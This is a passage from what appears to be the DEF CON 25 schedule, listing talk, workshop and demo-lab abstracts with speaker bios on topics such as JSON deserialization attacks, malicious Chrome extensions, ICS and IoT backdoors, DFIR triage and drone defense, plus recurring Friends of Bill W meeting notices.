Tom Sela (Twitter: @4x6hw) is Head of Security Research at illusive networks, specializing in Reverse Engineering, Malware Research, and OS internals. Prior to joining illusive, Tom lead the Malware Research team at Trusteer (acquired by IBM). Tom majored in Computer Science at Ben-Gurion University and studied at the Israeli Naval Academy, University of Haifa.


Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Saturday - 12:10-12:59


Fortune 100 InfoSec on a State Government Budget

Eric Capuano, SOC Manager at Texas Department of Public Safety

A common misconception is that it takes spending millions to be good at security. Not only is this untrue, but I will share ways that you can increase security posture while actually reducing spending. This talk outlines many of the tricks and mindsets to doing security well without breaking the bank. This is not the typical “Problem, problem, problem....” talk.... This is a solution-based talk that goes back to many of the basic challenges facing SOC teams everywhere.

Eric Capuano (Twitter: @eric_capuano) is an Information Security professional serving state and federal government as well as SMBs, start-ups and non-profits. Also, a member of the Packet Hacking Village team at DEF CON.


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 6 - Saturday - 10:30-14:30


Free and Easy DFIR Triage for Everyone: From Collection to Analysis

Saturday, 10:30 to 14:30 in Octavius 6

Alan Orlikoski

Dan M.

The hardest part of Digital Forensics and Incident Response (DFIR) is getting a meaningful look at "the goods". The digital artifact collection and parsing process usually requires a lot of time, money, or both. Wouldn't it be nice if there was a way to do this with a straightforward tool chain that was 100% free*, easy to setup, didn't require a PHD in coding, GitHub command mastery, and endless hours of "Where the @%^@$ did that dependency come from and how do I get it?" This course is a tutorial to the CyLR, CDQR, Forensics Virtual Machine (CCF-VM) where attendees will learn how to establish a working collection, data processing, and analysis solution for any size environment.

Attendees will setup and learn to use their own CCF-VM that includes: secure data collection from Windows and Linux Hosts, automated processing, and meaningful presentation of the data. After the data has been collected and processed, attendees will learn how to optimize dashboards for common kill chain analysis and Data Stacking.

*Your time must be worthless and your hardware free flowing

Prerequisites: Functional knowledge of Digital Forensics and Incident Response (DFIR) fundamentals including; the IR life-cycle, artifact collection and preservation, Timeline analysis, and modern threat kill chains. Attendee should have a working knowledge of network fundamentals, Windows and Linux configurations, and virtualization. Familiarization with VMWare / VirtualBox, Python, ElasticSearch, Kibana, and Plaso is ideal but not required.

Materials: A laptop capable of running either VirtualBox or VMWare software with 100GB Free HD space and; 8Gb Ram and an i5 equivalent processor (minimum), 16Gb Ram and i7 equivalent processor (preferred). All software is available from GitHub while virtual machines and data files will be available at the course. A 32Gb USB3.0 flash drive with the software, virtual machines, and data files will be made available for the attendees at a cost of $20 (materials fee).

Max students: 30 | Registration: https://dc25_orlikoski.eventbrite.com (Sold out!)

Alan Orlikoski
Alan has over 17 years of experience in both private and public sectors of the IT industry, with over 11 years of experience leading cyber security related projects. He has an extensive forensics background, written multiple open source forensic tools, profiled on the SQRRL Threat Hunter Blog, and presented at multiple security conferences. Alan has been a leader in some of the largest incident response and security operations center development programs in the history of multiple Fortune 100 companies. He also teaches Historical European Martial Arts (yup, he knows how to fight with a sword, poleaxe, spear...you get the picture)

Dan M.
Dan is a broad-spectrum technology professional with 18 years of experience, 13 in direct performance of Digital Forensics and Incident Response (DFIR). Dan has served as a contributor, Technical Lead, and Practice Lead for a Fortune 10 Incident Response service. In this role, Dan provided oversight to the goals and delivery of the service as well as a functioning as a senior incident handler and critical incident lead. Dan's investigation experience includes support for basic forensic analysis up through responses to complete enterprise breach scenarios. During this work Dan contributed to the patent development of enterprise threat intelligence sharing technologies. Dan has also been a presenter at events such as FIRST, Evanta, HTCIA, APWG, IEEE and many customer engagements.


Return to Index      -     

 

DEFCON - Track 4 - Sunday - 14:00-14:45


Friday the 13th: JSON attacks!

Sunday at 14:00 in Track 4

45 minutes | Demo, Exploit

Alvaro Muñoz Principal Security Researcher,Hewlett Packard Enterprise

Oleksandr Mirosh Senior Security QA Engineer, Hewlett Packard Enterprise

2016 was the year of Java deserialization apocalypse. Although Java Deserialization attacks were known for years, the publication of the Apache Commons Collection Remote Code Execution (RCE from now on) gadget finally brought this forgotten vulnerability to the spotlight and motivated the community to start finding and fixing these issues.

One of the most suggested solutions for avoiding Java deserialization issues was to move away from Java Deserialization altogether and use safer formats such as JSON. In this talk, we will analyze the most popular JSON parsers in both .NET and Java for potential RCE vectors.

We will demonstrate that RCE is also possible in these libraries and present details about the ones that are vulnerable to RCE by default. We will also discuss common configurations that make other libraries vulnerable.

In addition to focusing on JSON format, we will generalize the attack techniques to other serialization formats. In particular, we will pay close attention to several serialization formats in .NET. These formats have also been known to be vulnerable since 2012 but the lack of known RCE gadgets led some software vendors to not take this issue seriously. We hope this talk will change this. With the intention of bringing the due attention to this vulnerability class in .NET, we will review the known vulnerable formats, present other formats which we found to be vulnerable as well and conclude presenting several gadgets from system libraries that may be used to achieve RCE in a stable way: no memory corruption — just simple process invocation.

Finally, we will provide recommendations on how to determine if your code is vulnerable, provide remediation advice, and discuss alternative approaches.

Alvaro Muñoz
Alvaro Muñoz (@pwntester) works as Principal Software Security Researcher with HPE Security Fortify, Software Security Research (SSR). His research focuses on different programming languages and web application frameworks searching for vulnerabilities or unsafe uses of APIs. Before joining the research team, he worked as an Application Security Consultant helping enterprises to deploy their application security programs. Muñoz has presented at many Security conferences including DEF CON , RSA, AppSecEU, Protect, DISCCON, etc and holds several infosec certifications, including OSCP, GWAPT and CISSP, and is a proud member of int3pids CTF team. He blogs at http://www.pwntester.com.

@pwntester

Oleksandr Mirosh
Oleksandr Mirosh has over 9 years of computer security experience, including vulnerability research, penetration testing, reverse engineering, fuzzing, developing exploits and consulting. He is working for HPE Software Security Research team investigating and analyzing new threats, vulnerabilities, security weaknesses, new techniques of exploiting security issues and development vulnerability detection, protection and remediation rules. In the past, he has performed a wide variety of security assessments, including design and code reviews, threat modelling, testing and fuzzing in order to identify and remove any existing or potentially emerging security defects in the software of various customers.


Return to Index      -     

 

BillW - Office 4A on Promenade Level - Thursday - 12:00-13:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if youre trying to keep the horizon level in your windscreen. If youre a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. Well be there.
( See info booth next to office 4 on the map, if youre having trouble finding Office 4A)
Return to Index      -     

 

BillW - Office 4A on Promenade Level - Thursday - 17:00-18:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if youre trying to keep the horizon level in your windscreen. If youre a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. Well be there.
( See info booth next to office 4 on the map, if youre having trouble finding Office 4A)
Return to Index      -     

 

BillW - Office 4A on Promenade Level - Friday - 12:00-13:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if youre trying to keep the horizon level in your windscreen. If youre a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. Well be there.
( See info booth next to office 4 on the map, if youre having trouble finding Office 4A)
Return to Index      -     

 

BillW - Office 4A on Promenade Level - Friday - 17:00-18:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if youre trying to keep the horizon level in your windscreen. If youre a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. Well be there.
( See info booth next to office 4 on the map, if youre having trouble finding Office 4A)
Return to Index      -     

 

BillW - Office 4A on Promenade Level - Saturday - 12:00-13:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if youre trying to keep the horizon level in your windscreen. If youre a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. Well be there.
( See info booth next to office 4 on the map, if youre having trouble finding Office 4A)
Return to Index      -     

 

BillW - Office 4A on Promenade Level - Saturday - 17:00-18:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if youre trying to keep the horizon level in your windscreen. If youre a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. Well be there.
( See info booth next to office 4 on the map, if youre having trouble finding Office 4A)
Return to Index      -     

 

BillW - Office 4A on Promenade Level - Sunday - 12:00-13:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if youre trying to keep the horizon level in your windscreen. If youre a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. Well be there.
( See info booth next to office 4 on the map, if youre having trouble finding Office 4A)
Return to Index      -     

 

BillW - Office 4A on Promenade Level - Sunday - 17:00-18:00


Title:
Friends of Bill W

Vegas is a lot of fun, but it can also be just a lot. Too much, even, if youre trying to keep the horizon level in your windscreen. If youre a friend of Bill W joining us for DEF CON 25, please know that we have meetings at noon and five p.m., Thursday through Sunday in Office 4A, on the promenade level. Drop by if you need to touch base or just want a moment of serenity. Well be there.
( See info booth next to office 4 on the map, if youre having trouble finding Office 4A)
Return to Index      -     

 

DEFCON - Track 2 - Saturday - 16:00-16:45


From "One Country - One Floppy" to "Startup Nation" - the story of the early days of the Israeli hacking community, and the journey towards today's vibrant startup scene

Saturday at 16:00 in Track 2

45 minutes | Hacker History

Inbar Raz Principal Researcher, PerimeterX Inc.

Eden Shochat Equal Partner, Aleph

The late 80's and early 90's played a pivotal role in the forming of the Israeli tech scene as we know it today, producing companies like Checkpoint, Waze, Wix, Mobileye, Viber and billions of dollars in fundraising and exits. The people who would later build that industry were in anywhere from elementary school to high school, and their paths included some of the best hacking stories of the time (certainly in the eyes of the locals). The combination of extremely expensive Internet and international dial system, non-existent legal enforcement and a lagging national phone company could not prevent dozens of hungry-for-knowledge kids from teaching themselves the dark arts of reversing, hacking, cracking, phreaking and even carding. The world looked completely different back then and we have some great stories for you. We will cover the evolution of the many-years-later-to-be-named-Cyber community, including personal stories from nearly all categories. Come listen how the Israeli Cyber "empire" was born, 25 years ago, from the perspectives of 2:401/100 and 2:401/100.1.

Inbar Raz
Inbar has been reverse engineering for nearly as long as he has been living. It started with a screwdriver, pliers, wire cutters, and his grandfather's ECG machine, and gradually transitioned into less destructive research. In 1984, aged 9, he started programming on his Dragon 64. At 13 he got his first PC - Amstrad PC1512 - and within a year was already into reverse engineering. It wasn't long before he discovered how to access the X.25 network, Bitnet and Fidonet, and through high-school he was a key figure in the Israeli BBS scene.

Inbar spent most of his career in the Internet and Data Security field, and the only reason he's not in jail right now is because he chose the right side of the law at an early age. In fact, nowadays he commonly lectures about Ethical Hacking and Coordinated Vulnerability Disclosure.

Inbar specializes in outside-the-box approach to analyzing security and finding vulnerabilities, and is currently the Principal Researcher at PerimeterX, researching and educating the public on Automated Attacks on Websites.

@inbarraz
https://www.linkedin.com/in/inbar-raz-90a7913/

Eden Shochat
Eden Shochat builds stuff, most recently Aleph, +$330MM venture capital fund; The Junction, voted #1 startup program in Israel; face.com, a massive face recognition API acquired by Facebook; Aternity, the leading user-centric enterprise IT platform, acquired by Riverbed; and GeekCon, Europe's biggest makers conference. Eden grew up in Nigeria, where he was bored into assembly programming for the Z80 chip, graduated into the demo and cracking scenes while being thrown out of high-school but ended up being a (somewhat) productive member of society.

@eden
https://www.linkedin.com/in/edens/


Return to Index      -     

 

DEFCON - Track 1 - Thursday - 11:00-11:45


From Box to Backdoor: Using Old School Tools and Techniques to Discover Backdoors in Modern Devices

Thursday at 11:00 in 101 Track

45 minutes

Patrick DeSantis Senior Security Research Engineer, Cisco Talos

Stringing together the exploitation of several seemingly uninteresting vulnerabilities can be a fun challenge for security researchers, penetration testers, and malicious attackers. This talk follows some of the paths and thought processes that one researcher followed while evaluating the security of several new "out of the box" Industrial Control System (ICS) and Internet of Things (IoT) devices, using a variety of well known exploitation and analysis techniques, and eventually finding undocumented, root-level, and sometimes un-removable, backdoor accounts.

Patrick DeSantis
Patrick DeSantis is a security researcher with Cisco Talos and focuses his efforts on discovery and exploitation of vulnerabilities in technologies that have an impact on the physical world, such as Industrial Control Systems (ICS), Supervisory Control and Data Acquisition (SCADA), Internet of Things (IoT), and anything else that looks like it's asking to be hacked. Patrick's background includes work in both the public and private sectors, as well as a pile of information security certifications and a few college degrees.

@pat_r10t


Return to Index      -     

 

IOT - Main Contest Area - Saturday - 10:00-10:50



Return to Index      -     

 

IOT - Main Contest Area - Sunday - 11:00-11:50



Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 13:00-13:59


Title:
From OPSUCK to OPSEXY: An OPSEC Primer

1300 Friday
H0m3l3ss, Steve Pordon, and minion
@H0m3l3ssHacker @Legion303
From OPSUCK to OPSEXY: An OPSEC Primer

Return to Index      -     

 

ICS - Calibria - Friday - 11:00-11:30


Title: Fun with Modbus function code 90.

Forget 0 days, long live "forever days" ! In this talk, we'll take a look at how Schneider PLCs rely on an undocumented Modbus function code for administrative actions (start/stop, download and upload ladder logic, ...). We'll also demo the dedicated Metasploit program, and discuss the security level on newer Schneider PLCs. We'll conclude with defensive measures you can take to prevent attacks using this protocol.


Bio: Arnaud Soullie

Arnaud Soullié (@arnaudsoullie) is a manager at Wavestone, where he has been performing security audits, pentests and research for 7+ years. He has a specific interest in Active Directory security as well as ICS, two subjects that tend to collide nowadays. He teaches ICS security and pentests workshops at security conferences (BlackHat Europe 2014, BSides Las Vegas 2015, Brucon 2015, DEFCON) as well as full trainings (Hack In Paris 2015).



Return to Index      -     

 

Demolabs - Table 1 - Saturday - 10:00-11:50


Fuzzapi

Abhijeth Dugginapeddi

Lalith Rallabhandi

Srinivas Rao

Saturday from 1000-1150 at Table One

Audience: AppSec, Web/Mobile Developers, DevOps

Fuzzapi is a REST API pen testing tool that automatically does a bunch of checks for vulnerabilities on your APIs. Rather than a tool that only identifies vulnerabilities in web services, we have built a platform that enables everyone to test and understand a large range of API vulnerabilities that exist in both web and mobile applications. After seeing the benefits of Automating REST API pen testing using a basic Fuzzapi tool, the authors have decided to come up with a better version which can automatically look into vulnerabilities in APIs from the time they are written. REST APIs are often one of the main sources of vulnerabilities in most web/mobile applications. Developers quite commonly make mistakes in defining permissions on various cross-platform APIs. This gives a chance for the attackers to abuse these APIs for vulnerabilities. Fuzzapi is a tool written in Ruby on Rails which helps to quickly identify such commonly found vulnerabilities in APIs which helps developers to fix them earlier in SDLC life cycle. The first released version of the tool only has limited functionalities however, the authors are currently working on releasing the next version which will completely automate the process which saves a lot of time and resources.

https://www.youtube.com/watch?v=43G_nSTdxLk&t=321s

Abhijeth Dugginapeddi
Abhijeth D (@abhijeth) is a Security Consultant working for a bank in Australia. Previously worked with Adobe Systems, TCS and Sourcenxt. Security Enthusiast in the fields of Penetration Testing, Application/Mobile/Infrastructure Security. Believes in need for more security awareness and free responsible disclosures. Got lucky in finding few vulnerabilities with Google, Yahoo, Facebook, Microsoft, Ebay, Paypal, etc and one among Top 5 researchers in Synack a bug bounty platform. Also interested in Social media Marketing, Digital Marketing and Web designing.

Lalith Rallabhandi
Lalith Rallabhandi (@lalithr95) currently works as a Security Intern at Shopify. He has previously worked with Hackerrank, Zomato and Google Summer of Code. Likes to code, break stuff mostly with web applications and is a Ruby on rails Enthusiast. Found bugs with Google, Microsoft, Facebook, Badoo, Twitter etc.

Srinivas Rao


Return to Index      -     

 

DEFCON - Track 1 - Sunday - 13:00-13:45


Game of Chromes: Owning the Web with Zombie Chrome Extensions

Sunday at 13:00 in 101 Track

45 minutes | Demo

Tomer Cohen R&D Security Team Leader, Wix.com

On April 16 2016, an army of bots stormed upon Wix servers, creating new accounts and publishing shady websites in mass. The attack was carried by a malicious Chrome extension, installed on tens of thousands of devices, sending HTTP requests simultaneously. This "Extension Bot" has used Wix websites platform and Facebook messaging service, to distribute itself among users. Two months later, same attackers strike again. This time they used infectious notifications, popping up on Facebook and leading to a malicious Windows-runnable JSE file. Upon clicking, the file ran and installed a Chrome extension on the victim's browser. Then the extension used Facebook messaging once again to pass itself on to more victims.

Analyzing these attacks, we were amazed by the highly elusive nature of these bots, especially when it comes to bypassing web-based bot-detection systems. This shouldn't be surprising, since legit browser extensions are supposed to send Facebook messages, create Wix websites, or in fact perform any action on behalf of the user.

On the other hand, smuggling a malicious extension into Google Web Store and distributing it among victims efficiently, like these attackers did, is let's say - not a stroll in the park. But don't worry, there are other options.

Recently, several popular Chrome extensions were found to be vulnerable to XSS. Yep, the same old XSS every rookie finds in so many web applications. So browser extensions suffer from it too, and sadly, in their case it can be much deadlier than in regular websites. One noticeable example is the Adobe Acrobat Chrome extension, which was silently installed on January 10 by Adobe, on an insane number of 30 million devices. A DOM-based XSS vulnerability in the extension (found by Google Project Zero) allowed an attacker to craft a content that would run Javascript as the extension.

In this talk I will show how such a flaw leads to full and permanent control over the victim's browser, turning the extension into zombie. Additionally, Shedding more light on the 2016 attacks on Wix and Facebook described in the beginning, I will demonstrate how an attacker can use similar techniques to distribute her malicious payload efficiently on to new victims, through popular social platforms - creating the web's most powerful botnet ever.

Tomer Cohen
Tomer Cohen leads the team at Wix.com responsible for all R&D and production systems security. Previous to that, Tomer has worked as an application security expert in several firms. Tomer was also one of the founders of "Magshimim" cyber training program, which teaches development and cyber security among high-school students in the periphery of Israel.


Return to Index      -     

 

DEFCON - Track 4 - Saturday - 16:00-16:45


Game of Drones: Putting the Emerging "Drone Defense" Market to the Test

Saturday at 16:00 in Track 4

45 minutes | Art of Defense, Demo, Tool

Francis Brown Partner, Bishop Fox

David Latimer Security Analyst, Bishop Fox

When you learned that military and law enforcement agencies had trained screaming eagles to pluck drones from the sky, did you too find yourself asking: "I wonder if I could throw these eagles off my tail, maybe by deploying delicious bacon countermeasures?" Well you'd be wise to question just how effective these emerging, first generation "drone defense" solutions really are, and which amount to little more than "snake oil".

There is no such thing as "best practices" when it comes to defending against "rogue drones", period. Over the past 2 years, new defensive products that detect and respond to "rogue drones" have been crawling out of the woodwork. The vast majority are immature, unproven solutions that require a proper vetting.

We've taken a MythBusters-style approach to testing the effectiveness of a variety of drone defense solutions, pitting them against our DangerDrone. Videos demonstrating the results should be almost as fun for you to watch as they were for us to produce. Expect to witness epic aerial battles against an assortment of drone defense types, including:

• trained eagles and falcons that hunt "rogue drones"
• fighter drones that hunt and shoot nets
• drones with large nets that swoop in and snatch up 'rogue drones'
• surface-to-air projectile weapons, including bazooka-like cannons that launch nets, and shotgun shells containing nets
• signal jamming and hijacking devices that attack drone command and control interfaces
• even frickin' laser beams and Patriot missiles!

We'll also be releasing DangerDrone v2.0, an upgraded version of our free Raspberry Pi-based pentesting quadcopter (basically a ~$500 hacker's laptop, that can also fly). We'll be giving away a fully functional DangerDrone v2.0 to one lucky audience member!

So come see what's guaranteed to be the most entertaining talk this year and find out which of these dogs can hunt!

Francis Brown
Francis Brown, CISA, CISSP, MCSE, is a Managing Partner at Bishop Fox (formerly Stach & Liu), a security consulting firm providing IT security services to the Fortune 1000 and global financial institutions as well as U.S. and foreign governments. Before joining Stach & Liu, Francis served as an IT Security Specialist with the Global Risk Assessment team of Honeywell International where he performed network and application penetration testing, product security evaluations, incident response, and risk assessments of critical infrastructure. Prior to that, Francis was a consultant with the Ernst & Young Advanced Security Centers and conducted network, application, wireless, and remote access penetration tests for Fortune 500 clients.

Francis has presented his research at leading conferences such as Black Hat USA, DEF CON , RSA, InfoSec World, ToorCon, and HackCon and has been cited in numerous industry and academic publications.

Francis holds a Bachelor of Science and Engineering from the University of Pennsylvania with a major in Computer Science and Engineering and a minor in Psychology. While at Penn, Francis taught operating system implementation, C programming, and participated in DARPA-funded research into advanced intrusion prevention system techniques.

David Latimer
David Latimer is a Security Analyst at Bishop Fox, a security consulting firm providing IT security services to the Fortune 500, global financial institutions, and high-tech startups. In this role, he focuses on network and web application penetration testing.

He won a state Cisco Networking Skills competition for Arizona in 2013. He has acted as a network engineer for one of Phoenix's largest datacenters, PhoenixNAP, where he architected large-scale virtualization clusters and assisted with backup disaster recovery services.


Return to Index      -     

 

DEFCON - Track 4 - Sunday - 12:00-12:45


Genetic Diseases to Guide Digital Hacks of the Human Genome: How the Cancer Moonshot Program will Enable Almost Anyone to Crash the Operating System that Runs You or to End Civilization...

Sunday at 12:00 in Track 4

45 minutes

John Sotos Chief Medical Officer, Intel Corporation

The human genome is, fundamentally, a complex open-source digital operating system (and set of application programs) built on the digital molecules DNA and RNA.

The genome has thousands of publicly documented, unpatchable security vulnerabilities, previously called "genetic diseases." Because emerging DNA/RNA technologies, including CRISPR-Cas9 and especially those arising from the Cancer Moonshot program, will create straightforward methods to digitally reprogram the genome in free-living humans, malicious exploitation of genomic vulnerabilities will soon be possible on a wide scale.

This presentation shows the breathtaking potential for such hacks, most notably the exquisite targeting precision that the genome supports — in effect, population, and time — spanning annoyance to organized crime to civilization-ending pandemics far worse than Ebola.

Because humans are poor at responding to less-than-immediate threats, and because there is no marketplace demand for defensive technologies on the DNA/RNA platform, the hacker community has an important role to play in devising thought-experiments to convince policy makers to initiate defensive works, before offensive hacks can be deployed in the wild. Hackers can literally save the world... from ourselves.

John Sotos
John Sotos is Chief Medical Officer at Intel Corporation. He has been programming computers continuously since 1970, excepting four years of medical school at Johns Hopkins, where he also trained as a transplantation cardiologist. His professional interests include hacking the medical diagnostic process, first with a book on edge cases, called "Zebra Cards: An Aid to Obscure Diagnosis," followed by six years as a medical technical consultant on the popular television series "House, MD." His masters degree in artificial intelligence is from Stanford, and he is a co-founder of Expertscape.com. He is a long-time air rescue flight surgeon for the National Guard; however, the opinions presented here are his own, and do not necessarily represent those of the Department of Defense or Intel.

www.intel.com
www.sotos.com


Return to Index      -     

 

DEFCON - Track 3 - Saturday - 10:00-10:30


Get-$pwnd: Attacking Battle-Hardened Windows Server

Saturday at 10:00 in Track 3

20 minutes | Demo, Tool

Lee Holmes Principal Security Architect, Microsoft

Windows Server has introduced major advances in remote management hardening in recent years through
PowerShell Just Enough Administration ("JEA"). When set up correctly, hardened JEA endpoints can provide
a formidable barrier for attackers: whitelisted commands, with no administrative access to the underlying
operating system.

In this presentation, watch as we show how to systematically destroy these hardened endpoints by exploiting
insecure coding practices and administrative complexity.

Lee Holmes
Lee Holmes is the lead security architect of Microsoft's Azure Management group, covering Azure Stack,
System Center, and Operations Management Suite. He is author of the Windows PowerShell Cookbook,
and an original member of the PowerShell development team.


Return to Index      -     

 

DEFCON - Track 4 - Sunday - 10:20-10:40


Ghost in the Droid: Possessing Android Applications with ParaSpectre

Sunday at 10:20 in Track 4

20 minutes | Demo, Tool

chaosdata Senior Security Consultant, NCC Group

Modern Android applications are large and complex, and can be a pain to analyze even without obfuscation - static analysis can only get one so far, the debugger sucks, Frida doesn't give you enough access to the Java environment, and editing smali or writing Xposed hooks can be time consuming and error prone. There has to be a better way!

What if we could inject a command line REPL into an app to drive functionality? And what if we could also make writing function hooks fast and easy?

In this talk, I will introduce ParaSpectre, a platform for dynamic analysis of Android applications that injects JRuby into Android applications. It bundles a hook configuration web API, a web application interface to configure and edit hooks, and a connect-back JRuby REPL to aid application exploration from the inside-out. It supports various selectors to match classes and methods, can be reconfigured on-the-fly without requiring a device reboot, and takes the pain out of writing method hooks for Android apps.

ParaSpectre is for developers and security researchers alike. While not itself a debugger, it provides a level of access into a running application that a debugger generally won't.

chaosdata
chaosdata(aka "Jeff") is a security consultant by day, and sometimes by night. He hacks on embedded systems, mobile apps and devices, web apps, and complicated things that don't have names. He also likes exotic candies.

@chaosdatumz


Return to Index      -     

 

Demolabs - Table 2 - Saturday - 10:00-11:50


GibberSense

Ajit Hatti

Saturday from 1000-1150 at Table Two

Audience: Cryptologers, crypt analysts, forensic investigators, developers and testers.

On your forensics and investigation assignment found a Gibberish string or unknown file and dont know what is it? Throw it to GibberSense, it might try to make some sense out of it.

Not sure if a file is encrypted, encoded or obfuscated using substitution ciphers? Gibbersense can give you statistical analysis of the contents and gives you direction for further investigation and also gives you an excellent visualization.

Being an extensible framework, Gibbersense gives tools for simple xor encryption, frequency analysis, which gives basic cryptanalysis capabilities.

An Open Source Initiative GibberSense is an experimental tool for improving investigations.

https://github.com/smxlabs/gibbersense

Ajit Hatti
Ajit Hatti has been contributing on secure usage of cryptography from past 5 years and currently focusing on the security issues of BlockChain related Technologies. He is an author of LAMMA & GibberSense tools which help in securing crypto and PKI Implementatinos.

Ajit is founder of SecurityMonx and is also working in collaboration with Payatu on futuristic projects. He also co-founded Null Open Security Community and has worked with Symantec, Emerson, ZScaler, IBM and Bluelane as a Security Researcher.

Ajit has presented his work at BlackHat DEFCON Crypto-n-Privacy Village and organizes Nullcon in India. He loves to Run & Volunteer at BSides LV and organizes The World Run by Hackers.


Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Sunday - 12:10-12:59


Go Beyond Tabletop Scenarios by Building an Incident Response Simulation Platform

Eric Capuano, SOC Manager at Texas Department of Public Safety

How prepared is your incident response team for a worst case scenario? Waiting for a crisis to happen before training for a crisis is a losing approach. For things that must become muscle memory, instinctive, you must simulate the event and go through the motions. This talk is a deep-dive technical discussion on how you can build your own DFIR simulation. Best part -- almost all of this can be accomplished with open source tools and inexpensive equipment, but I'll also share tips and tricks on getting free commercial hardware and software for use in your new simulation environment!

Eric Capuano (Twitter: @eric_capuano) is an Information Security professional serving state and federal government as well as SMBs, start-ups and non-profits. Also, a member of the Packet Hacking Village team at DEF CON.


Return to Index      -     

 

Wireless - Florentine BR I & II - Promenade Level - Saturday - 17:00-17:55


Tim Kuester

Bio

Tim K is an electronics engineer living in Virginia Beach. He enjoys designing embedded systems and working with radios. Previously, he has taught workshops on Software Defined Radio at conferences like Kiwicon and Cyberspectrum. His favorite programming language is solder.

@bjt2n3904

Bio

Woody: Noob at heart. Its rumored he can lift heavy things but probably can't spell them. Until a few years ago he thought Linux was Charlie Brown's best friend.

@tb69rr

GODUMP-NG packet sniffing the Gotenna

Abstract

GoTenna is a wireless communication tool, popular for providing encrypted "off-the-grid" communications on unlicensed MURS channels. Using SDR, GNU Radio, and scapy we developed a tool to capture packets from all the channels, simultaneously. This allowed us to characterize device behavior, study the packet protocol, and passively monitor communications. In this talk, we will explain or methodologies, demonstrate our tools live, and show how to preform link analysis: who is talking with whom, when, and how much.


Return to Index      -     

 

Demolabs - Table 3 - Sunday - 10:00-11:50


GoFetch

Tal Maor

Sunday from 1000-1150 at Table Three

Audience: Enterprise, Applied Security, Windows domain, Defense and offense

GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application. The tool first loads a path of local admin users and computers generated by BloodHound and convert it to its own attack plan format. Once the attack plan is ready, it advances towards the destination according to the plan, step by step by successively apply remote code execution techniques and compromising credentials with Invoke-Mimikatz, Mimikatz and Invoke-Psexec.

A video of the Python version was published here: https://www.youtube.com/watch?v=dPsLVE0R1Tg A video of Invoke-GoFetch will be published soon. BloodHound Application - https://github.com/BloodHoundAD/BloodHound

Tal Maor
Tal Maor is a Security Researcher at Microsoft who has a passion for creating tools which makes life easy and more secured. Prior to Microsoft, Tal was developing intelligence platforms in a leading company, and previously served in the IDF intelligence unit for four years. Tal holds a B.Sc degree in Computer Science.


Return to Index      -     

 

CHV - Village Talks Outside Contest Area, Pool Level - Saturday - 11:00-11:59


GPS System Integrity

No description available


Return to Index      -     

 

CHV - Village Talks Outside Contest Area, Pool Level - Friday - 13:30-14:30


Grand Theft Radio (Stopping SDR Relay Attacks on PKES)

No description available


Return to Index      -     

 

Demolabs - Table 3 - Saturday - 12:00-13:50


GreatFET

Dominic Spill

Michael Ossmann

Saturday from 1200-1350 at Table Three

Audience: Hardware & Offense

GreatFET is an open source hardware hacking platform. In addition to support for common protocols such as SPI, USB, JTAG, and UART, GreatFET also allows us to implement arbitray protocols, as well as GPIO and acting as a logic analyser. Add on boards, known as neighbors, allow us to build on the flexibility of GreatFET and rapidly create new tools. Example neighbors include radio platforms, software defined infrared transceivers, and interfaces for hardware hacking.

Hardware: https://github.com/greatscottgadgets/greatfet Software/firmware: https://github.com/dominicgs/GreatFET-experimental

Dominic Spill
Dominic is a senior security researcher at Great Scott Gadgets, where he builds open source tools for reverse engineering communication protocols.

Michael Ossmann
Michael is a wireless security researcher who makes hardware for hackers. He founded Great Scott Gadgets in an effort to put exciting, new tools into the hands of innovative people.


Return to Index      -     

 

ICS - Calibria - Saturday - 16:00-16:30


Title: Grid insecurity - and how to really fix this shit

You don’t need to be nation state backed, sophisticated, or even organized to take down the grid. Anyone can hack ICS/SCADA (even Donald Trump’s 400 pound guy sitting on his bed!). And the thing is, for years, we’ve been talking about finding 0-day in the grid, water treatment facilities, and other critical infrastructure. For the past ten or so years, con talks have focused on two things: all the fun 0-days, and the thousand products you should buy to be protected. But they never address the complexity of the actual problem. ICS is made up of endless numbers of components from just as many manufacturers – vulnerabilities are just the result of either incomplete systems design, or poor implementation. Most weaknesses are discovered at interfaces between software providers, coding languages, and system component boundaries; where vulnerabilities are introduced by the sum of all parts. Protecting ICS/SCADA is a systems level problem – and splitting it up into distinct pentests is not the solution. It means never solving the end-to-end issue, and ultimately cannibalizing an organization’s security budget by applying band-aids, instead of fixing the systemic issue.
This talk will not be another talk about how f*cked the problem is, instead it’ll reframe the issue as a systemic one, and talk about ways to fix it end-to-end.


Bio: Bryson Bort

